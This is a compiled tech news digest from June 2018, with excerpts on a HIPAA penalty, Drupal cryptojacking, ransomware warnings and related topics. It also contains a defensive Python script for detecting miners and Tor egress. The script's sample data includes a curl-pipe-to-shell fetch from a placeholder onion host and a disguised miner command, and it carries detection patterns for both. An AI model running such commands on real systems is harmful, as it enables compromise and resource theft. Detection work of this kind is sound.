Daily Tech Digest - June 23, 2018

$4.3 Million HIPAA Penalty for 3 Breaches

"Despite the encryption policies and high risk findings, MD Anderson did not begin to adopt an enterprisewide solution to implement encryption of ePHI until 2011, and even then, it failed to encrypt its inventory of electronic devices containing ePHI between March 24, 2011, and January 25, 2013," the statement adds. The administrative law judge agreed with OCR's arguments and findings and upheld OCR's penalties for each day of MD Anderson's noncompliance with HIPAA and for each record of individuals breached, OCR notes. "OCR is serious about protecting health information privacy and will pursue litigation, if necessary, to hold entities responsible for HIPAA violations," says OCR Director Roger Severino. "We are pleased that the judge upheld our imposition of penalties because it underscores the risks entities take if they fail to implement effective safeguards, such as data encryption, when required to protect sensitive patient information." OCR alleges that MD Anderson claimed that it was not obligated to encrypt its devices and asserted that the ePHI at issue was for "research," and thus was not subject to HIPAA's nondisclosure requirements.



Cultural, leadership issues plague many digital transformation efforts

Digital transformation is a complex effort from the internal perspective, and to make it even more challenging, it shouldn't appear to be that way from the customer perspective, explains James Campbell, practice lead with experience design at Shalom. “Some of the biggest challenges with internal forces – like buy-in and commitment from all functional areas, sponsorship from executives, board and other governing bodies, and willingness to redefine KPIs – actually pale in comparison to the effort required to prevent your digital transformation from becoming your customer's problem, too,” Campbell says. When organizations fail to realize that, poorly implemented digital transformation can cause lost sales, loyalty and public reputation, “and it can make or break the type of effort that will differentiate the companies of today from the companies of tomorrow,” Campbell says. “While many industries are considering digital transformation, CEOs in asset-intensive industries are less likely to consider IT a priority, and low levels of historic investment may have created an environment with poor digital readiness,” explains Allen E. Look


How The TOGAF® Standard Enables Agility


Top-down, the Enterprise Strategic Architecture provides a high-level view of the area of the enterprise impacted by change; the Capability Architectures are detailed descriptions of (increments of) capability to be delivered. These are Sprints in the agile world. They are sufficiently detailed to be handed to developers for action. As the diagram shows, sprints can occur in parallel. A key consideration is that the sprints are time-boxed and aimed at addressing a set of bounded objectives. The Capability Architectures should be tightly scoped to address those objectives. The higher levels show the relationships and dependencies between capability increments and provide the framework for managing the risk of unanticipated consequences. They provide the information needed to assess the overall impact of a proposed change. Bottom-up, there is feedback from the implementation of capability increments which influences the higher levels. The enterprise strategic architecture may evolve as a result of experience gained from the deployment of each and every capability increment.


Silver Peak SD-WAN adds service chaining, partners for cloud security


These partnership additions build on Silver Peak's recent update to incorporate a drag-and-drop interface for service chaining and enhanced segmentation capabilities. For example, Silver Peak said a typical process starts with customers defining templates for security policies that specify segments for users and applications. This segmentation can be created based on users, applications or WAN services -- all within Silver Peak SD-WAN's Unity Orchestrator. Once the template is complete, Silver Peak SD-WAN launches and applies the security policies for those segments. These policies can include configurations for traffic steering, so specific traffic automatically travels through certain security VNFs, for example. Additionally, Silver Peak said customers can create failover procedures and policies for user access. Enterprises are increasingly moving their workloads to public cloud and SaaS environments, such as Salesforce or Microsoft Office 365. Securing that traffic -- especially traffic that travels directly over broadband internet connections -- remains top of mind for IT teams, however.


Musk says Tesla data leaked by disgruntled employee

“Could just be a random event, but as Andy Grove said, ‘Only the paranoid survive,’” Musk wrote Monday, referring to the late chairman and CEO of Intel Corp. “Please be on the alert for anything that’s not in the best interests of our company.” Tesla can ill afford manufacturing setbacks now. It’s racing to meet a target to build 5,000 Model 3s a week by the end of this month, a goal Musk told shareholders on June 5 that the company was “quite likely” to achieve. The company’s forecasts for generating profit and cash in the third and fourth quarters of this year are based on this objective, and falling short would reignite concerns about whether the company may need to raise more capital. A Tesla spokeswoman confirmed the authenticity of the Monday email, which CNBC reported first. Smoldering in an air filter in the welding area of Tesla’s body line was extinguished in a matter of seconds, she said. Production has resumed and there were no injuries or significant equipment damage, she added.


Three-month-old Drupal vulnerability is being used to deploy cryptojacking malware

The researchers note that this particular attack uses interesting techniques, including hiding behind the Tor network to evade detection. The malware also checks to see whether a previous miner is running on the system before installing the payload via a series of shell scripts and executables. As well as hiding behind the Tor network, the attacker or attackers are also using a Virtual Private Network (VPN) in an effort to hide their tracks, but there is a linked IP address. Researchers say there have been hundreds of attempts to conduct attacks via this IP over the last month, although not all involve the Drupal vulnerability: some are related to the Heartbleed vulnerability. There's no indication as to the exact number of cryptojacking attacks that have been conducted using the Drupal vulnerability, but it serves to remind organisations that they should be patching vulnerabilities -- especially those deemed critical -- in order to protect against attacks. "Patching and updating the Drupal core fixes the vulnerability that this threat exploits. 
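The two host-level tells the article describes, a miner already running (the malware checks for one before dropping its own payload) and traffic routed towards Tor, are straightforward to hunt for. The script below is an added example, not code from the article or from the researchers it cites. It runs over constructed `ps -eo pid,pcpu,comm,args` and `ss -tnp` style output embedded in the block, and flags miner-looking processes, a sustained hot process, `.onion` references in command lines, and sockets to Tor's default ports. The process names, argument patterns, CPU threshold and port numbers are heuristics assumed here, not indicators published with this story; tune them to your environment.

```python
"""Heuristic hunt for an unauthorised crypto-miner and Tor egress on a Linux host.

Added example. Parses `ps -eo pid,pcpu,comm,args` and `ss -tnp` style text
(constructed samples below) and reports indicators. Every pattern and port
listed here is an assumption, not an IOC from the reported campaign.
"""
from __future__ import annotations

import re
from dataclasses import dataclass

# Assumed heuristics: common miner binaries and command-line markers.
MINER_NAMES = {"xmrig", "minerd", "cpuminer", "xmr-stak", "cryptonight"}
MINER_ARG_PATTERNS = [
    re.compile(r"stratum\+(tcp|ssl)://", re.I),            # pool URL scheme
    re.compile(r"--donate-level", re.I),                   # xmrig-style flag
    re.compile(r"-o\s+\S+:(3333|4444|5555|7777|14444)\b"),  # typical pool ports
]
# Assumed Tor defaults: SOCKS 9050/9150, ORPort 9001, DirPort 9030.
TOR_PORTS = {9050, 9150, 9001, 9030}
CPU_THRESHOLD = 80.0  # percent; one process pegging a core is the usual tell


@dataclass
class Finding:
    kind: str
    pid: int
    detail: str


def parse_ps(ps_output: str) -> list[dict]:
    """Parse `ps -eo pid,pcpu,comm,args` lines; the header row is skipped."""
    rows = []
    for line in ps_output.strip().splitlines()[1:]:
        parts = line.split(None, 3)
        if len(parts) < 3:
            continue
        args = parts[3] if len(parts) == 4 else ""
        rows.append({"pid": int(parts[0]), "pcpu": float(parts[1]),
                     "comm": parts[2], "args": args})
    return rows


def parse_ss(ss_output: str) -> list[dict]:
    """Parse `ss -tnp` lines: State Recv-Q Send-Q Local Peer users:(...)."""
    conns = []
    for line in ss_output.strip().splitlines()[1:]:
        parts = line.split()
        if len(parts) < 5:
            continue
        host, _, port = parts[4].rpartition(":")
        m = re.search(r"pid=(\d+)", line)
        conns.append({"pid": int(m.group(1)) if m else -1,
                      "peer_host": host, "peer_port": int(port)})
    return conns


def detect(ps_output: str, ss_output: str) -> list[Finding]:
    """Return one Finding per indicator; a renamed binary is still caught by its args."""
    findings: list[Finding] = []
    for p in parse_ps(ps_output):
        name_hit = p["comm"].lower() in MINER_NAMES
        arg_hit = any(pat.search(p["args"]) for pat in MINER_ARG_PATTERNS)
        if name_hit or arg_hit:
            findings.append(Finding("miner_process", p["pid"],
                                    f'{p["comm"]} {p["args"]}'.strip()))
        elif p["pcpu"] >= CPU_THRESHOLD:
            findings.append(Finding("hot_process", p["pid"],
                                    f'{p["comm"]} at {p["pcpu"]}% CPU'))
        if ".onion" in p["args"].lower():
            findings.append(Finding("tor_reference", p["pid"], p["args"]))
    for c in parse_ss(ss_output):
        if c["peer_port"] in TOR_PORTS:
            findings.append(Finding("tor_egress", c["pid"],
                                    f'{c["peer_host"]}:{c["peer_port"]}'))
    return findings


# Constructed sample output (not captured from a real host). The miner has been
# renamed to look like a kernel thread, so only its arguments give it away.
SAMPLE_PS = """\
  PID %CPU COMMAND   ARGS
    1  0.0 systemd   /sbin/init
  842  0.3 apache2   /usr/sbin/apache2 -k start
 2231 97.5 kworkerds /tmp/.x/kworkerds -o stratum+tcp://pool.example:3333 -u 4A... --donate-level=1
 2240  1.2 sh        sh -c curl -s http://example.onion/i.sh | sh
"""
SAMPLE_SS = """\
State Recv-Q Send-Q Local Address:Port Peer Address:Port Process
ESTAB 0      0      10.0.0.5:44122     198.51.100.7:9050 users:(("kworkerds",pid=2231,fd=5))
ESTAB 0      0      10.0.0.5:443       203.0.113.9:52110 users:(("apache2",pid=842,fd=12))
"""

if __name__ == "__main__":
    for f in detect(SAMPLE_PS, SAMPLE_SS):
        print(f"[{f.kind}] pid={f.pid} {f.detail}")
```

On a live host, feed it the real output of `ps -eo pid,pcpu,comm,args` and `ss -tnp`; the web-server user (`www-data` for a typical Drupal install) spawning `sh -c curl ... | sh` is the pattern to pivot on when triaging, and none of this substitutes for applying the Drupal core update the article recommends.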


FBI warns of increasing ransomware, firmware attacks


Along with those newer types of attacks, the tried-and-true insider threat also isn’t going away soon, said Morrison, speaking at the Hewlett Packard Enterprise Discover conference in Las Vegas on Wednesday. The organizations taking advantage of those attacks are increasingly sophisticated and well-funded criminal groups. “We need to get off the mindset that criminals are living in their basement, that a cybercriminal is some kid that’s living in the basement of their mom’s house,” Morrison said. “These are fully functional, 24/7 data center operations, operating in countries where they have some kind of asylum, in many cases.” About 75 percent of the cyberattacks against companies in the United States come from organized crime groups, Morrison added. “Understand that’s the magnitude of what you’re facing,” he told the audience. In some cases, these criminal organizations also have ties to nation states. “We’re seeing this blending of nation state and criminal organizations,” Morrison said. After all, “why would a nation state take a chance of being exposed when they can just hire a criminal group?”


Early detection of compromised credentials can greatly reduce impact of attacks


There is a growing industry in the cybercrime ecosystem focused on obtaining valid login credentials using multiple mechanisms and tools. These tools can now be cheaply acquired in underground darknet markets and forums, and you don't have to be a highly seasoned cybercriminal to launch an attack. According to our credential detection data, from the start of 2018 to the end of May there was a 39 percent increase in the number of compromised credentials we detected from Europe and Russia, compared to the same period in 2017. In fact, Blueliv's observations conclude that Europe and Russia make up half of the world's credential theft victims. We also found that when we remove Russia from the dataset, the growth figure for European theft victims jumps to 62 percent. These European growth figures are surprisingly higher than North America's, which recorded a decline of almost half in this period. We think that these cybercriminal success rates mean that the credential theft industry is growing in the European region, both in innovation and scope. We believe there are several reasons for this.


Blockchains on mobile, IoT devices: Can fog computing make it happen?

Edge computing is a way to bring the processing center closer to the source of data, or the “edge,” significantly cutting down costs and processing time by tapping a network of computers whose owners offer their storage and processing power to the network's clients in exchange for pay. Edge computing doesn't necessarily need to be blockchain-based, but in several ways the two technologies overlap. In essence, these participating computers are like blockchain miners, except anyone can use their processing power for any process at any given time—it could be mining, scientific calculations, video streaming, or anything else. Unlike blockchains, edge computing services are not limited to a specific use case. The quickest differentiator I've seen between edge and fog is from Cisco: “Fog computing is a standard that defines how edge computing should work, and it facilitates the operation of compute, storage and networking services between end devices and cloud computing data centers. Additionally, many use fog as a jumping-off point for edge computing.” Fog computing is another emerging technology that can make blockchains even more powerful than they already are.


CISO careers: Several factors propel high turnover


A CISO's role today is primarily risk management, where they are more of an advisor and strategist while being a technologist behind the scenes. Establishing a security risk steering committee with other C-suite members is one of several effective ways to engage with business leaders. The old ways of instilling fear, uncertainty and doubt to drive support for additional budget and large projects are long gone. The CISO should be perceived as a business partner, adaptable to business changes and threats, a team player, and have a continuous improvement mindset across people, process and sometimes technology needs. Additionally, the CISO should be focused on self-improvement -- a coach and/or mentor is essential to becoming a very effective senior leader. Athletes at the highest levels always have a coach, often many coaches, from experts in their sport to nutritionists who keep them as healthy as possible. Why shouldn't CISOs? The CISO has one of the most challenging roles and should have both a senior business leader and an industry peer as mentors and, if the organization supports it, an executive coach to improve their leadership and organizational influence skill set.



Quote for the day:


"It is easier to act yourself into a new way of thinking, than it is to think yourself into a new way of acting." -- A.J. Jacobs